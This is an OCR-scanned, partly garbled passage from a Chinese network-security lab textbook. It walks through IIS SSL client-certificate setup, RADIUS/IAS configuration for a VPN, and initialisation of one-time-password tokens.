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ED E cs 77172 30.0 05 cen terere em 


=] Brajer” 

Microsoft 证 书 服务 一 labl EA 3 

申请 一 个 证 书 

选择 一 个 证 书 类 型 : 

用 户 证 书 
或 者 ,提交 一 个 高 级 证 书 申请 。 
E 

DEI FTT TT nem 


图 17-48 ”申请 证 书页 面 


高 级 证 书 申请 


Ch 的 策略 决定 您 可 以 申请 的 证 书 关 别 。 单 击 下 列 迁 项 之 一 来: 


创建 并 向 此 CA 棍 交 一 个 申请 ， 
使 用 hase6d 编码 的 CC 


通过 使 用 竺 能 卡 证 书 注册 
注意 : 您 必 俩 有 一 个 注册 代理 i 


10 fir 一 个 证 书 申请 ， 或 使 用 base64 SEED PKCS #7 文件 纺 订 证 书 由 请。 
另 一 用 户 甲 请 一 个 智能 卡 证 书 。 
AB PBR. 


TT TT T emet 


图 17-49 ”高 级 证 书 申请 页 面 

(4) 在 出 现 的 页 面 中 单 击 【 浏 览 】 按 钮 ， 选 择 刚才 保存 的 请 求 文件 ， 单 击 【 提 交 】 
按钮 ， 如 图 17-50 所 示 。 

(5) 如 按 以 上 操作 成 功 ， 则 出 现 以 下 页 面 ， 如 图 17-51 所 示 。 
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R— MTB DART DH 


要 提交 一 个 保存 的 四 请 到 CA. TEREORA EPRA TRIMER Web 服务 器 ) 生 成 的 base-64 SRI CIC 或 PRCS #10 EBA 
‘BK PECS #7 TRH, 


| 


证 书 已 僻 ; 
您 中 请 的 证 书 已 币 发 给 您 ， 
GER 编码 或 Case 64 编码 


earn 


4 
m —TFTTT Me 


17-51 证 书 已 颁发 页 面 


3. 服务 器 证 书 的 颁发 与 安装 

服务 器 证 书 的 颁发 与 安装 与 17.1.1 节 中 实验 步骤 3 和 步骤 4 相同 ， 请 参考 完成 。 

4. 客户 端 证 书 申请 、 颁 发 与 安装 

在 另外 一 台 计 算 机 上 重复 上 面 服务 器 证 书 申请 、 颁 发 与 安装 的 步骤 ， 完 成 客户 端 证 
书 的 申请 、 颁 发 与 安装 。 
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5. 在 服务 器 端 配置 SSL 连接 

COD 单 击 【开始 】|【 程 序 】|【 管 理工 具 】|【IIS (Intemet 信息 服务 ) 管理 器 】 3d 
出 窗口 中 右 击 【 默 认 网 站 】， 在 弹出 的 快捷 菜单 中 选择 【属性 】 选 项 。 

(2) 在 弹出 的 窗口 内 选择 【目录 安全 性 】 选 项 卡 ， 单 击 【 安 全 通信 】 中 的 【查看 证 
书 】 按 钮 ， 弹 出 【证 书 】 对 话 框 ， 如 图 17-52 所 示 。 

G) 单 击 【 确 定 】 按 钮 后 返回 【目录 安全 性 】 面 板 ， 选 择 【 安 全 通信 】 中 的 【编辑 】 
项 , 在 弹出 的 如 图 17-53 所 示 的 对 话 框 中 选中 【要 求 安全 通道 SSL] RAHE, 并 在 【 客 
户 端 证 书 】 栏 中 选中 【接受 客户 端 证 书 】 复 选 框 ， 再 单 击 【 确 定 】 按 钮 。 


[| 
[Iv 要 求 安全 通道 人 5D @) — — — — — — — — — —3 
T- ER 128 fih (D 


这 个 证 书 的 目的 如 下 


。 所 有 颁发 策略 EPER 
“* 所 有 应 用 程序 策略 


r 启用 客户 端 证 书 映射 U) 

mE RSE” n 

颁发 者 :lab ges. | 
有 效 起 始 日 期 2005-12-13 到 2010-12-13 厂 局 用 证 书信 任 列表 QD 

ED 可 

| jp erom] 
mm | mo 
图 17-52 【证 书 】 对 话 框 图 17-53 服务 器 端 SSL 的 安全 通信 配置 


(4) 返回 【目录 安全 性 】 面 板 ， 单 击 【 应 用 】 按 钮 及 【确定 】 按 钮 ， 完 成 配置 。 

6. 客户 端 通过 SSL 与 服务 器 端 建立 连接 

(1) 在 客户 端 打 开 TE 浏览 器 ， 如 果 输 入 地 址 http:// 根 CA 的 IP/certsrv， 则 显示 如 
图 17-54 所 示 错 误 信息 页 面 ， 要 求 采用 HTTPS (ZEH HTTP) 连接 服务 器 。 

(2) 输入 地 址 http:// 根 CA 的 IP/certsrv， 弹 出 提示 对 话 框 ， 如 图 17-55 所 示 。 

G) 单 击 【 确 定 】 按 钮 ， 弹 出 【数字 选择 证 书 】 对 话 框 ， 如 图 17-56 所 示 。 

在 对 话 框 中 选择 步骤 (2) 中 申请 的 证 书 ， 单 击 【确定 】 按 钮 。 

(4) 将 弹出 正常 的 证 书 申请 页 面 ， 完 成 基于 SSL 的 连接 。 

(5) 使 用 Sniffer 软件 ， 在 第 三 方 计算 机 上 监测 未 使 用 SSL 连接 和 使 用 SSL 连接 的 
信息 ， 并 加 以 对 比 。 可 以 看 到 使 用 SSL 连接 后 不 再 出 现 POST 类 型 的 有 效 信息 包 ， 截 获 
的 信息 均 为 无 效 的 乱码 (可 参考 Sniffer 相关 实验 )。 


【实验 报告 】 
(1) 写 出 服务 器 证 书 申请 、 颁 发 与 安装 的 操作 步 又 。 
OD 写 出 客户 端 证 书 申请 、 颁 发 与 安装 的 操作 步 又 。 
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~ Microsoft Internet Explorer 


[El ncs //172.90.0.25/eartry 


该 页 必须 通过 安全 通道 查看 
您 江 本 沪 问 的 页 面 使 用 安全 套 接 字 层 GSD 进行 保护 


TARRY, PERE 
© 在 您 要 访问 的 地 址 前 输入 https:// FE Enter iB. 


HTTP HRR 403.4 - 禁止 访问 ; 需要 使 用 SSL 查看 该 资源 - 
Internet 信息 服务 CIS) 


技术 信息 《 为 技术 多 持 人 员 提 供 } 


o BER] Microsoft 产品 支持 服务 并 提 索 包括“HTTP” 和 “403” 的 标题 。 
， 打 开 “TT3 WRP CTE TT3 BAR Gung) POA) ， MERA ex 
FRA". “安全套 按 字 屋 SSL)” 和 “关于 自 定义 情 设 涌 息 ”的 主 是 


图 17-54 ”网 页 连接 错误 信息 页 面 


该 页 必须 通过 安全 通道 查看 
从 试图 沪 问 的 页 而 使 用 安全 套 接 字 景 (5L) 进行 保护 , 


TALL Pat | 
， 在 您 要 访问 的 地 北 前 输入 https:77 并 按 Enterè. 


DT 错误 403 4 - 禁止 访问 : 需要 使 用 SSL 查看 该 资源 
Internet 信息 服务 CIS) 


技术 信息 ( 为 技术 支持 人 员 提 供 》 


e SERI Microsoft BES RS IRR “HTP” F 
e 打开 “11s Bb" COTE IIS 管理 器 finetmgr) 中 
于 安全 " 、 “安全套 接 字 层 (SSL)” 和 “关于 目 定义 , 


LL -— C— T und uud ul a 0 
17-55 ”安全 提示 
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xe) RSU SEO HAV IAV BBO |i 


ia 


+ Sb P ANRA RARE. 


. ERE 


Gre o daper OO SEB 3 
HAE) [E] ncs //1r2.30.0.25/certry EREK 
[i] 无 法 显示 网 页 D 


各 正在 查找 的 页 当前 不 可 月 ， 网站 可 能 本 村 问题 ， SEES RE 
OM OE. 


ARAFE 


FET ao i 


部 | 
m. 
gH, SWOT. 


JETRUSA HR. DIE HR 
Internat Explorer 


= 
E 


BE Wipe 7/ 17e. 300 t5/ cura - TTT TT fo tateraet 


(3) 写 
(4) 写 
(5) 将 


图 17-56 【数字 选择 证 书 】 对 话 框 
出 在 服务 器 端 配置 SSL 连接 的 操作 步骤 。 
出 客户 端 通过 SSL 与 服务 器 端 建立 连接 的 操作 步骤 。 
上 述 步 骤 截 图 并 保存 。 


【思考 题 】 


查阅 相 


17.2 


关 资 料 ， 完 成 在 Linux 操作 系统 下 基于 Web 的 SSL 连接 的 设置 。 


一 次 性 口令 系统 及 RADIUS 协议 


17:2: 
【实验 
认证 协议 的 
的 RADIUS 


1 RADIUS 协议 


目的 】 

次 实验 , 来 学 习 认证 、 授 权 和 记 账 服务 CAAA) 的 基本 内 容 , 并 强化 RADIUS 
基本 内 容 ， 掌 握 Windows 2000 Server 的 RADIUS 服务 器 和 基于 VPN-PPTP 
客户 端的 配置 方法 。 


【实验 原理 】 
AAA 是 认证 、 授 权 、 记 账 服务 的 全 称 ，RADIUS 是 目前 比较 常用 的 AAA 协议 ， 


RFC2865 和 
认证 、 授 权 


RFC2866 业界 标准 对 RADIUS 协议 作 了 详细 描述 。RADIUS 用 于 提供 身份 
和 记 账 服务 。RADIUS 消息 作为 用 户 数据 报 协议 CUDP) 消息 被 发 送 。UDP 


端口 1812 用 于 发 送 RADIUS 身份 认证 消息 ，UDP 端口 1813 用 于 发 送 RADIUS 记 账 消 
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息 。 有 些 网 络 访问 服务 器 可 能 会 使 用 UDP 端口 1645 发 送 RADIUS 身份 认证 消息 ， 而 使 
用 UDP 端口 1646 发 送 RADIUS 记 账 消息 。 

如 果 在 路 由 器 上 配置 了 RADIUS 认证 ,那么 认证 过 程 按 口令 是 否 在 网 络 上 直接 传输 
分 为 两 类 : PAP 和 CHAP。 

CD 在 端口 上 采用 PAP 认证 。 用 户 以 明文 的 形式 把 用 户 名 和 密码 传递 给 路 由 器 ， 路 
由 器 把 用 户 名 和 加 密 过 的 密码 放 到 认证 请 求 包 的 相应 属性 中 ， 传 递 给 RADIUS 服务 器 ， 
根据 RADIUS 服务 器 的 返回 结果 来 决定 是 否 允 许 用 户 上 网 。 

(2) 在 端口 上 采用 CHAP 认证 , 当 用 户 请 求 上 网 时 , 路 由 器 会 向 用 户 端 发 送 一 个 “ 挑 
战 〈Challenge)” 消 息 〈 比 如 一 段 随机 码 ); 用 户 端 根据 “挑战 ”消息 ， 采 用 单 向 杂凑 函 
数 计 算出 一 个 杂凑 值 作为 “回应 〈Response)” 发 送 给 路 由 器 : 路 由 器 将 “挑战 ”信息 、 
“响应 ”信息 以 及 请 求 认 证 的 用 户 ID 发 送 给 RADIUS 服务 器 , RADIUS 服务 器 会 根据 “ 挑 
战 ” 消息 采用 同样 的 单 向 杂凑 函数 和 相同 的 密 钥 〈 比 如 根据 户 用 ID 查 表 获 得 ) 计算 出 认 
证 方 的 响应 值 ， 并 与 用 户 “ 响 应 ”信息 中 的 杂凑 值 进行 对 比 : 如 符合 ， 则 认证 通过 ; 如 
不 符合 ， 则 认证 失败 。 此 外 ，RADIUS 服务 器 还 会 不 定 周期 的 向 用 户 端 发 送 新 的 挑战 ， 
重复 上 述 认 证 过 程 ， 如 出 现 认 证 失败 ， 则 断 开 用 户 端 和 路 由 器 的 链接 。 

Microsoft Windows 2000 Server 的 Internet 认证 服务 CAS) 是 RADIUS 服务 器 和 代 
理 的 Microsoft 实现 。 在 下 面 的 实验 内 容 中 ， 将 详细 讲述 利用 IAS 构建 一 个 RADIUS JR 
务 器 ， 并 用 这 个 服务 器 实现 VPN 的 认证 和 授权 。 


【实验 环境 】 


两 台 操 作 系统 为 Windows 2000 Server 的 服务 器 ， 一 台 Windows 2000 或 者 Windows 
XP 的 客户 机 ， 三 台 机 器 通过 一 个 集线器 (Hub) E 
接 。 在 本 实验 中 ， 使 用 如 图 17-57 所 示 的 IP 设置。 


【实验 步骤】 S 
1. 建立 VPN 服务 器 和 客户 端 


在 前 面 的 章节 中 ， 已 经 了 解 了 VPN-PPTP 的 配 GU A a0 
置 过 程 ， 本 实验 中 的 客户 端 配置 方法 与 前 面 是 完全 


一 样 的 。 在 此 ， 只 对 VPN 服务 器 的 配置 介绍 一 遍 。 VND Sat ”客户 端 ”RADIUS 服 务 器 


集线器 


10.0.0.2 10.0.0.3 10.0.0.1 
CD 打开 控制 面板 中 【管理 工具 】 的 【路 由 和 图 17.5 acti 
远程 访问 进入 以 后 右 击 本 地 服务 器 图 标 , 选择 [ 配 
置 并 启用 路 由 和 远程 访问 】。 


(2) 进入 向 导 后 ， 单 击 【 下 一 步 】 按 钮 ， 在 【公共 设置 】 对 话 框 中 选择 【虚拟 专用 
网 络 (VPN) 服务 器 】 单 击 【下 一 步 】 按 钮 。 

(3) 确定 TCP/IP 协议 在 【远程 客户 协议 】 对 话 框 的 列表 中 ， 就 可 以 立即 单 击 【下 一 
步 】 按 钮 。 

(4) [Macintosh 客户 身份 认证 】 和 【Internet 连接 】 对 话 框 可 以 单 击 【下 一 步 】 按 
钮 跳 过 。 
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(5) 在 【地 址 范围 指定 】 中 ， 这 里 指定 地 址 10.0.0.1~10.0.0.10. 
(6) 进入 【管理 多 个 远程 访问 服务 器 】 后 ， 选 择 【 是 ， 我 想 使 用 一 个 RADIUS 服务 
器 】 单 选 按钮 ， 如 图 17-58 所 示 。 


图 17-58 ”选择 服务 器 使 用 RADIUS 


(7) 接 下 来 在 【主要 RADIUS 服务 器 】 文 本 框 中 输入 服务 器 “10.0.0.1”， 并 输入 
【共享 的 机 密 】 123456” 如 图 17-59 所 示 。 


ay 


RADIUS 服务 器 选择 
您 可 以 指定 想 用 来 执行 身份 验证 和 计 账 的 RADIUS 服务 器 。 


17-59 RADIUS 服务 器 地 址 及 密码 设置 
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(8) 单 击 【下 一 步 】 按 钮 ，VPN 的 服务 器 即 配置 完成 。 

2. 建立 RADIUS 服务 器 

CD 打开 【控制 面板 】 中 的 【添加 和 删除 程序 】 对 话 框 弹出 后 单 击 右边 的 【添加 或 
删除 Windows 组 件 】 从 【组 件 】 列 表 框 中 寻找 【网 络 服务 】 并 双击 ， 弹 出 如 图 17-60 
所 示 的 对 话 框 ， 选 中 【Internet 验证 服务 】， 并 单 击 【确定 】 按 钮 退出 。 此 时 ， 系 统 将 自 
动 安装 该 组 件 ， 过 程 中 可 能 提示 需要 Windows 2000 的 系统 光盘 ， 最 好 自 备 一 份 。 


xi 
sical 二 


O fite Server ILS 服务 1.7 MB 
O Biindows Internet 命名 服务 WINS) 1.0 MB 
D 埋 动 六 主机 配置 协议 HCP) 0.0NB .. 


Hë: oe ot caa Cae ee 通过 Internet Information 


所 需 磁 盘 空 间 : 12.2 MB EEO | 
可 用 磁盘 空间 : 833.7 MB 


om» | 
图 17-60 ”安装 Internet 验证 服务 


(2) [Intemet 验证 服务 】 安 装 完成 后 ， 到 【控制 面板 】 中 的 【管理 工具 】 中 寻找 并 
双击 打开 该 组 件 ， 此 时 将 弹出 【Intemet 验证 服务 】 窗口 ， 如 图 17-61 所 示 。 


Internet 验证 服务 E eles] 
| eto 坦 看 W || e 9 | emn |? | 9 || 6 () 
树 


Q) 欢迎 使 用 internet 验证 服务 


Q 远程 访问 记录 
IY 远程 访问 策略 


IETF 村 远程 身份 验证 拨号 用 户 服务 
(RADIUS) 协 议 。 


要 启用 tas 服务 器 以 读 取 Active Directory 中 的 
用 户 账 户 的 远程 访问 属性 ， 请 在 ' 操 作 ' 沫 单 
PAETE Active Directory 中 注册 服务 "。 


有 关 设置 vs 的 更 多 信息 ， 请 参照 联机 帮助 
中 的 清单 : 为 拨号 和 ven 访问 配置 IAS" 和 
"清单 : 为 外 部 拨号 访问 配置 As"。 


有 关 IAS 配置 的 更 多 信息 ， 请 参照 联机 帮助 
中 的 主题 * oc 司 访 REKER 
RRA ia”, "Internet 访 通过 服务 提 
供 商 的 外 包 式 公 Mu Feu i) 


TT Ee | 


I 
图 17-61 — [Internet 验证 服务 】 窗 口 


G) 默认 情况 下 ， 该 服务 是 自动 运行 的 ， 可 以 右 击 【Internet 验证 服务 (本 地 )】)， 如 


284 


果 没 有 启动 ， 可 以 选择 【启动 服务 】。 
(4) 右 击 【客户 端 〗 选择 【新 建 客户 端 〗 弹出 向 导 后 ， 首 先 输入 该 客户 端的 名 称 
(注意 ， 只 为 了 “好 记 ” 不 影响 其 配置 )， 这 里 使 用 “for VPN” 如 图 17-62 所 示 。 


图 17-62 输入 客户 端 名 称 


(5) 单 击 【下 一 步 】 按 钮 ， 将 弹出 【添加 RADIUS 客户 端 】 对话 框 ， 需 要 强调 的 
是 ， 此 处 的 “客户 端 ” 指 的 是 VPN 服务 器 。 在 该 对 话 框 中 输入 VPN 服务 器 的 IP 地 址 
10.0.0.2， 还 有 共享 的 机 密 123456， 如 图 17-63 所 示 。 在 此 输入 确认 后 ， 单 击 【 完 成 】 
按钮 退出 。 


添加 RADIUS BP he 


17-63 ”客户 端 设置 


(6) 接 下 来 是 添加 访问 客户 ， 该 客户 的 添加 同样 在 RADIUS 服务 器 中 的 【计算 机 管 
理 】 中 。 通 过 【控制 面板 】|【 管 理工 具 】|【 计 算 机 管理 】 打 开 。 

《7)【 计 算 机 管理 】 打 开 后 ， 在 左边 树 状 目录 中 双击 【本 地 用 户 和 组 】 d UH 
P 选择 【新 用 户 】 在 【新 用 户 】 对 话 框 中 输入 用 户 名 和 密码 ， 并 选择 【用 户 下 次 登 
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录 时 须 更 改 密码 】 复 选 框 ， 单 击 【 创 建 】 按 钮 保存 退出 ， 如 图 17-64 所 示 。 


xl 
APZW: fr-confiz 


sap: ad 


确认 密码 C): i" 


Tv 用 户 下 次 登录 时 须 更 改 密码 QD. 
T 用 户 不 能 更 改 密码 (8) 

T 密码 永 不 过 期 mg) 

T 账户 已 停 用 @) 


图 17-64 添加 新 用 户 


(8) 回 到 【计算 机 管理 】 窗口 后 , 在 右边 用 户 列 表 中 右 击 刚 创 建 的 用 户 名 , 选择 【 属 
TEY And 17-65 所 示 。 弹 出 【属性 】 对 话 框 后 ， 选 择 【 拨 入 】 选 项 卡 ， 在 【远程 访问 权 
E RAR VPN)】 一 栏 中 选择 【允许 访问 】 单 选 按钮 ， 接 着 单 击 【 确 定 】 按 钮 退出 ， 
如 图 17-66 所 示 。 


| 操作 (8) zzv || e 9 amx e G3 | (9 
8| 


5 计算 机 管理 (本 地 ) 3 管理 计算 机 ( 域 ) 的 内 置 账户 
Bh, RAIA E HRADE ae 
ij 事件 查看 器 EJIUSR_CONFIG Internet KRIS 匿名 访问 Internet 信息 服务 E 
3 启动 进程 之 外 的 应 用 程序 的 


这 个 用 户 账户 被 终端 服务 所 


E sg rit 
国 磁盘 管理 
ly 磁盘 碎片 整理 程序 
€ 逻辑 驱动 器 
E 可 移动 存储 
Eo 服务 和 应 用 程序 


[ 
图 17-65 ”选择 用 户 属性 


(9) 这 一 步 并 不 是 必需 的 ， 但 为 了 管理 方便 ， 建 议 大 家 使 用 。 右 击 左边 树 状 目录 中 
的 【组 】 选择 【新 建 组 ])， 弹 出 【新 建 组 】 对 话 框 , 输入 组 的 名 字 如 “VPN”， 如 图 17-67 
所 示 。 
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axl 

常规 | RET | 配置 文件 BA | 

广远 程 访 问 权限 GRA ve) — — — — — — — — — —3j 

6 BERE OY LL BEL 
C 拒绝 访问 Q) mag. — [m —— 
C 通过 远程 访问 策略 控制 访问 (P) 


EQ: [ 
T- 验证 呼叫 方 mw: | 
EE 


C FEO 
C 由 呼叫 方 设置 ( 羽 路 由 和 远程 访问 服务 ) © 
C 总 是 回 氢 到 D: 

T 分 配 静 态 IP itO 
[T 应 用 静态 路 由 QD 


为 此 氢 入 连接 定义 要 启用 的 路 由 。 Howe QU. | 


m 


ge | XAW 


图 17-66 设置 用 户 访问 权限 图 17-67 【新 建 组 】 对 话 框 


然后 单 击 【 添 加 】 按 钮 ， 弹 出 【选择 用 户 或 组 】 对 话 框 后 在 上 面 的 列表 框 中 选中 允 
许 访 问 VPN 服务 器 的 用 户 名 ， 然 后 单 击 【添加 】 按钮 。 添 加 完成 后 单 击 【确定 】 按 钮 退 
出 ， 回 到 【新 建 组 】 对 话 框 后 单 击 【创建 】 按 钮 保存 退出 ， 如 图 17-68 所 示 。 
ziz 
A00: (sows i 
€ Administrator CONFIG 
Guest CONFIG 
£i IUSR_CONFIG CONFIG 


@ ron coc 
f TsInternet: 


sazna | 


图 17-68 添加 组 成 员 


此 时 ， 可 以 在 VPN 客户 端 使 用 刚 创建 的 用 户 名 和 密码 接 入 VPN 服务 器 。 由 于 拓扑 
中 使 用 了 Hub， 所 以 可 以 通过 Sniffer 观察 连接 过 程 。 

(10) 在 实际 情况 下 ， 必 须 对 访问 进一步 限制 ， 这 就 要 求 配置 远程 访问 策略 。 回 到 
[Internet 验证 服务 】 窗 口 ， 右 击 【 远 程 访问 策略 】， 选 择 【 新 建 远程 访问 策略 】。 进 入 向 
导 后 ， 也 需要 命名 该 策略 ， 如 “for VPN”， 然 后 单 击 【下 一 步 】 按 钮 ， 弹 出 【条 件 】 对 
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话 框 后 就 可 以 添加 访问 条 件 ， 单 击 【 添 加 】 按 钮 ， 可 发 现 其 限制 方法 非常 丰富 。 在 此 举 
个 例子 : 限制 访问 用 户 的 所 在 组 ， 在 【选择 属性 】 对 话 框 中 ， 选 择 最 下 面 的 
Windows-Groups， 如 图 17-69 所 示 。 单 击 【 添 加 】 按 钮 后 ， 弹 出 【选择 组 】 对 话 框 ， 双 
击 刚才 创建 的 组 VPN 即 可 加 入 ， 单 击 【 确 定 】 按 钮 退出 ， 如 图 17-70 所 示 。 
EF xl 


选择 要 添加 的 属性 类 型 ， PAIS Sic "san" A. 
W: 


er Stal 
CallingStai tie ions za OFA RAAT S E 
RADIUS 客户 的 好 记名 称 。 nly) 
RADIUS EM T IP 地 址 。 ts only) 
AS 的 制造 商 CAS on 


Eu d 
要 使 用 的 


oM WAS 的 字符 审 CLAS only) 
发 起 请 求 的 NAS BO IP 地 址 (TAS only) 
NAS 发 起 请 求 所 用 的 物理 端口 类 型 

用 户 请 求 的 服务 类 型 


要 使 用 的 隆 道 操作 协议 
RIP RETRO Windows dH 


图 17-69 ”限制 访问 用 户 的 所 在 组 一 


Ss xt 
asump:[gom — 2 


SR | 检查 名 称 | 
CONFIGVPN 


图 17-70 ”限制 访问 用 户 的 所 在 组 二 


接着 可 以 继续 添加 更 多 的 策略 ， 此 处 跳 过 ， 回 到 【条 件 】 对 话 框 ， 单 击 【下 一 步 】 按钮 。 
在 【权限 】 对 话 框 中 ， 选 择 【 授 予 远 程 访问 权限 】 单 击 【下 一 步 】 按 钮 ， 完 成 该 向 导 。 
至 此 ， 便 完成 了 远程 访问 权限 的 配置 ， 读 者 可 以 通过 该 例子 配置 自己 的 访问 控制 。 


【实验 报告 】 

(1) 简 述 RADIUS 认证 协议 的 基本 内 容 。 

(2) 简 述 Windows 2000 Server 的 RADIUS 服务 器 和 基于 VPN-PPTP 的 RADIUS 客 
户 端的 配置 方法 。 

(3) 将 实验 过 程 中 的 重要 步骤 截图 并 保存 。 
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【思考 题 】 

AAA 协议 除 RADIUS 外 ， 还 有 Kerberos， 查 阅 关 于 Kerberos 的 资料 并 与 RADIUS 
进行 比较 。 

17.2.2 一 次 性 口令 系统 

【实验 目的 】 

COD 掌握 动态 口令 认证 ( 即 OTP 认证 ) 的 基本 原理 和 认证 流程 ， 了 解 认证 系统 的 组 
成 结构 和 部 署 方 法 。 

(2) 实现 对 已 有 动态 口令 算法 动态 链接 库 文件 的 调用 ， 掌 握 动态 口令 重 同步 过 程 


原理 


【原理 简介 】 
(1) 动态 口令 的 主要 设计 思路 是 在 登录 过 程 中 加 入 不 确定 因素 ， 使 每 次 登录 过 程 中 
通过 信息 摘要 MD 所 得 到 的 密码 不 相同 ， 以 提高 登录 过 程 的 安全 性 。OTP 认证 是 一 种 摘 
要 认证 ， 它 以 单 向 散 列 函数 作为 数据 模型 ， 以 变 长 的 信息 作为 输入 ， 把 它 压缩 成 一 个 定 
长 的 输出 值 ， 即 使 输入 的 信息 有 很 小 的 变化 ， 输 出 定 长 的 摘要 值 将 会 发 生 很 大 的 变化 。 
对 于 摘要 而 言 ， 通 过 给 定 一 个 输出 ， 去 寻找 一 个 输入 以 产生 相同 的 输出 在 计算 上 是 不 可 
行 的 ， 即 单 向 的 。 根 据 不 确定 因素 选择 方式 的 不 同 ，OTP 有 以 下 几 种 不 同 的 实现 机 制 ; 
挑战 /应 答 机 制 ，S/key 机 制 ， 时 间 同 步 机 制 ， 事 件 同步 机 制 。 

(2) 本 实验 中 设计 的 动态 口令 身份 认证 系统 由 硬件 令 牌 、 管 理 系统 、 认 证 系统 、 数 
据 库 系统 等 组 成 ， 其 系统 的 框图 如 图 17-71 所 示 ， 图 中 展示 了 一 个 完整 的 用 户 注 册 、 认 
证 的 过 程 。 


a ©) 
ig 
理 系统 平台 \ Z 认证 
管理 系统 平台 ”| 用 户 注册 同时 ， 管 理 平台 ”认证 服务 器 提取 用 户 信息 ,| 1 认证 服务 器 
向 数据 库 写 入 新 用 户 信息 进行 相关 认证 
I 
I 
l 
I 
用 户 注册 ， 管 理 平台 给 用 A 客户 端 把 用 户 名 和 一 次 性 
户 发 放 一 个 硬件 令 牌 口令 传送 给 认证 服务 器 
数据 库 系统 | 
I 
| 到 加 认 证 信息 
atri. Meses [N 
一 信和 产生 ,然后 由 用 户 输入 到 各 户 六 “< 
用 户 返回 认证 信息 客户 端 
硬件 令 牌 


17-71 动态 口令 认证 系统 的 框图 
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(3) 基于 事件 的 一 次 性 口令 认证 机 制 用 户 和 服务 器 端 很 容易 失 同 步 ， 例 如 用 户 不 
小 心 或 者 故意 按 了 硬件 令 牌 (Token) 上 的 按钮 , 这样 令 牌 (Token) 的 计数 器 (Counter) 
就 会 加 1， 但 是 服务 器 上 的 计数 器 (Counter) 还 是 原来 的 值 ， 服 务 器 和 令 牌 (Token) 
就 失去 了 同步 。 为 了 解决 这 个 问题 ， 服 务 器 端 设置 了 一 个 同步 窗口 值 Cewindow) ， 当 
用 户 使 用 令 牌 (Token) 产生 的 一 次 性 口令 登录 服务 器 时 ， 服 务 器 会 在 这 个 窗口 的 范围 
内 去 逐一 匹配 用 户 发 送 过 来 的 口令 ， 如 果 窗 口内 任何 一 个 值 匹配 成 功 ， 服 务 器 会 返回 
认证 成 功 信息 ， 并 且 改 变 服务 器 文件 中 的 计数 器 值 ， 使 服务 器 和 令 牌 (Token) 再 次 
同步 。 

(4) 但 是 如 果 用 户 硬件 令 牌 的 失 步 严重 ， 在 同步 窗口 值 Cewindow) 内 无 法 完成 重 
同步 ， 这 时 就 需要 用 户 持 令 牌 到 管理 系统 处 进行 重 同步 ， 用 户 提供 失 步 令 牌 的 序列 号 
tokensn 和 两 个 连续 的 动态 口令 OTP， 由 令 牌 管理 系统 进行 重 同步 。 

(5) 本 实验 详细 介绍 实现 令 牌 重 同步 的 动态 口令 链接 库 文件 Resyn.dll 的 使 用 。 


【实验 环境 】 

Windows 操作 系统 平台 , OTP 令 牌 , 注入 器 , OTP 系统 配套 软件 ，Visual Studio 2005 
开发 平台 。 

【实验 步 又 】 

1. 令 牌 初始 化 及 添加 用 户 

CD 将 令 牌 注入 端口 通过 USB 接口 与 主机 相连 。 

(2) 单 击 【 开 始 】| 【程序 】|【 令 牌 管理 系统 ])， 运 行 管理 系统 软件 。 出 现 如 图 17-72 
所 示 的 提示 后 单 击 【 确 定 】 


Tokeninit 


图 17-72 ”使 用 指南 


(GO 数据 库 设 置 : 单 击 菜单 栏 上 的 【设置 】|【 数 据 库 设置 ]， 出 现 如 图 17-73 所 示 的 
对 话 框 , 【数据 库 类 型 】 可 选 为 MySQL 或 SQLSever;【 服 务 器 IP】 即 为 WinOtp 服务 器 
所 在 主机 的 IP 地 址 ;【 端 口号 】 为 默认 值 ， 不 用 修改 ;【 管 理 员 账号 】 为 admin;【 管 理 
员 密 码 】 为 1234， 设 置 完 毕 后 单 击 【确定 】 按 钮 。 

(4) 串口 设置 : 单 击 菜单 栏 上 的 【设置 】 代 数据 库 设 置 】〗 出 现 如 图 17-74 所 示 的 对 
话 框 ， 此 处 所 要 选择 的 串口 要 通过 设备 管理 器 查看 ， 如 图 17-75 所 示 ， 查 看 【端口 】 
[USB-SERIAL CH341 一 项 , 后 面 括号 中 所 示 端 口号 即 所 要 设置 的 端口 号 , 此 处 为 COM4。 
然后 在 【串口 设置 】 对 话 框 中 选择 COM4， 单 击 【 开 串 口 〗 会 提示 打开 串口 成 功 ， 单 击 
【确定 】 按 钮 ， 设 置 完成 。 
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Ca) 


图 17-73 【数据 库 设 置 】 对 话 框 图 17-74 【串口 设置 】 对 话 框 


号 设备 管理 器 

文件 多) RFW FEW Mew 
t» faea 

= i) GUOXUDONG-LENOV 


四 她 DVD/CD-ROM 驱动 器 
IDE ATA/ATAPI 控制 器 
和 RAID 控制 器 


口 (LPTI) 
USB-SERIAL CH341 (COM4) 


ORO (Com) 
计算 机 


HB Marvell Yukon 88E8056 PCI-E Gigabit Ethernet Controller 
E9 TAP-Win32 Adapter V8 
Hg Vivare Virtual Ethernet Adapter for Vinetl 


图 17-75 串口 查看 


G) 查看 用 户 信息 : 如 图 17-76 所 示 ， 是 令 牌 管理 系统 的 主 界面 ， 单 击 【 连 接 数据 
库 】 按 钮 即 可 查看 数据 库 中 已 存在 用 户 ， 单 击 用 户 名 可 以 查看 对 应 信息 ， 并 进行 添加 、 
修改 、 删 除 等 操作 。 

(6) 添加 新 用 户 及 令 牌 初始 化 : 单 击 图 17-76 中 的 【添加 】 按 钮 ， 出 现 如 图 17-77 
所 示 的 对 话 框 ,【 用 户 ID】 中 填 入 用 户 认证 时 所 用 的 用 户 名 ，TokenSN 中 填 入 令 牌 出 厂 
时 分 配 的 唯一 硬件 序列 号 ， 选 中 【使 用 默认 KEY】 并 单 击 KEY 按钮 ， 得 到 OTP 生成 因 
子 。 然 后 在 令 牌 未 开启 状态 下 ， 将 令 牌 注入 器 串口 线 的 7 根 与 令 牌 上 的 7 个 小 孔 对 应 相 
连 ， 并 在 保持 连接 的 状态 下 开启 令 牌 ， 单 击 图 17-77 中 的 【确定 】 按 钮 。 如 连续 出 现 “ 写 
入 令 牌 成 功 ” 和 “ 写 入 数据 库 成 功 ” 则 此 步 完成 。 
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马 令 牌 初始 化 - TokenInit 
ZAG) MED WAY REO SMe APDE WB 
Dee: be oe 


FAP ID [testuser BEEN 
TokenSN: |BH201092633 /—— quf 
BRB | hte tis 
[产生 KEY 


图 17-77 添加 用 户 及 令 牌 初始 化 


2. 客户 端 登录 认证 

COD 开启 硬件 令 牌 ， 输 入 正确 的 硬件 PIN 码 ， 读 取 液 晶 屏幕 上 显示 的 动态 口令 。 

(2) 单 击 【 开 始 】| 【程序 】|OtpClient， 出 现 如 图 17-78 所 示 的 认证 客户 端 ， 将 【 重 
